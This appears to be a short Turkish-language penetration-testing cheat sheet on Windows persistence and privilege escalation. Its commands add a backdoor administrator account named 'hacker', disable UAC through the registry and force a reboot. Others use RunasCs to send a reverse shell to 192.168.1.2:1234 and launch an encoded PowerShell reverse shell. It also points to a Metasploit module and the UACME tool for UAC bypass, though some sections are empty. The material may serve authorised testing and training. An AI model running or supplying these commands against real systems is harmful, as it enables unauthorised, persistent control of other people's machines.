Windows Persistence

SMB Persistence

net user hacker password123! /add
net localgroup administrators hacker /add

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

shutdown /r /t 0

Kullanıcı Değiştirme

# Sadece GUI varsa olur o yüzden Remote Desktop Users grubunda birini bul
runas /user:backupadmin cmd

# Gui Yoksa
.\RunasCs.exe administrator password123 powershell.exe -r 192.168.1.2:1234

Process Reverse Shell

Start-Process powershell -ArgumentList "-NoProfile -EncodedCommand BASE64_REV"

UAC Bypass

UAC (User Account Control), Windows işletim sistemlerinde kullanıcı hesaplarının yetkilerini denetlemeye yarayan bir güvenlik özelliğidir.

UAC etkinleştirildiğinde, kullanıcılar yönetici yetkisi gerektiren bir işlem gerçekleştirmek istediklerinde, öncelikle bir onay penceresiyle karşılaşırlar.

Aşağıdaki msf modülü ile bypass denenebilir.

Aynı işlem UACME aracı ile de yapılabilir. Reverse shell ve aracı temp klasörüne yüklüyoruz ve aşağıdaki komutu çalıştırıyoruz.

UACME: https://github.com/hfiref0x/UACME/releases

RDP Persistence

Last updated